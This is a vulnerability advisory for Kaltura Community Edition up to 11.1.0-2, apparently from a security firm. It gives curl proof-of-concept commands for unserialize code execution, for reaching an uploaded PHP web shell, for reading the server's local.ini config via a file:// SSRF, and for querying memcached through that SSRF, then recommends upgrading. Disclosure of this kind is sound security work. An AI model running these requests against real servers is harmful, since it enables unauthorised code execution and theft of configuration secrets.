( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Kaltura Community Edition Multiple Vulnerabilities Affected versions: Kaltura Community Edition <=11.1.0-2 PDF: http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf +-----------+ |Description| +-----------+ The Kaltura platform contains a number of vulnerabilities, allowing unauthenticated users to execute code, read files, and access services listening on the localhost interface. Vulnerabilities present in the application also allow authenticated users to execute code by uploading a file, and perform stored cross site scripting attacks from the Kaltura Management Console into the admin console. Weak cryptographic secret generation allows unauthenticated users to bruteforce password reset tokens for accounts, and allows low level users to perform privilege escalation attacks. +------------+ |Exploitation| +------------+ ==Unserialize Code Execution== The following PHP POC will generate an object that leads to code execution when posted to an endpoint present on the server. Authentication is not required. [POC] ------------ The Base64 encoded object generated above should be included in the kdata section of the following curl request: $curl http://[HOST]/index.php/keditorservices/redirectWidgetCmd?kdata=$[sploit] ==Arbitrary File Upload== Users authenticated to the KMC with appropriate privileges can upload arbitrary files through the "Upload Content" functionality. This can be used to upload a PHP web shell as an image file and gain command execution. In order to excute the code, the on-disk path of the uploaded file must be obtained, and then browsed to directly. Obtaining the uploaded file's path can be achieved with the following command. [POC] $curl http://[HOST]/index.php/keditorservices/getAllEntries?list_type=1&entry_id=0_3v2568rx -b "[Valid Cookie]" Directly accessing the path "url" returned by the above request will result in the exceution of the uploaded php script. $curl http://[HOST]/[URL PATH] ==SSRF / File Read (Limited)== A limited number of files on the host can be read by passing a "file://" protocol handler to a CURL call. [POC] $curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=file://127.0.0.1/opt/kaltura/app/configurations/local.ini Arbitrary IP addresses can be supplied, resulting in an SSRF issue. The following POC uses the SSRF issue to send a command and retrieve statistics from memcached listening on localhost, which is present in a default Kaltura install. [POC] $curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211 -m 2 --data $'b=set nl 0 60 4\n\n\n\n\n' $curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211 --data "c=get nl&d=stats&e=quit" +----------+ | Solution | +----------+ Upgrading to the most recent version of Kaltura (11.7.0-2) will fix the majority of these issues. No fixes are available for some of the issues disclosed, so carefully firewalling off the Kaltura interface is recommended. +------------+ | Additional | +------------+ A disclosure timeline, further information and additional less critical vulnerabilities are available in the accompanying PDF. http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf